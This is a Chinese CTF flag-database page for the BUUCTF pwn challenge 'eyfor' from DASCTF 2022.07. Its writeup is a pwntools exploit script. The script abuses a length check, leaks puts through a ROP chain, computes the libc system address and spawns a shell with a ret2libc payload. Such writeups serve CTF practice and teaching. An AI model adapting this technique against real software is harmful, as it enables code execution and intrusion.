[随波逐流]CTF Flags

   [随波逐流]CTF Flags

软件版本:v1.0.0   数据版本: v20260201
返    回

[DASCTF2022.07赋能赛]eyfor

 广告模块
ID: 6458
标题: [DASCTF2022.07赋能赛]eyfor
描述: None
类型: Pwn
网站: BUUCTF
题目链接: https://buuoj.cn/challenges#[DASCTF2022.07赋能赛]eyfor
赛事: DASCTF2022.07赋能赛
年度: 2022
Flag值:
writeup: 验证后的网址


from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io = process('./eyfor')
#io = remote('node5.buuoj.cn',26262)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./eyfor')
io.sendlineafter('go','a')
io.sendlineafter('message:','1')
io.sendlineafter('message:','1')
io.sendlineafter('message:','1')
io.sendlineafter('message:','1')
io.sendline('4294967220')
io.recvline()
pop_rdi = 0x0000000000400983
payload = b'a'*0x38 + p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x4007B7)
io.send(payload)
io.recvuntil('CST\n')
puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
system = puts_addr - libc.sym['puts'] + libc.sym['system']
binsh = puts_addr - libc.sym['puts'] + next(libc.search('/bin/sh'))
payload = b'a'*0x38 + p64(pop_rdi+1) + p64(pop_rdi) + p64(binsh) + p64(system)
io.send(payload)
io.interactive()
答案错误,我要更正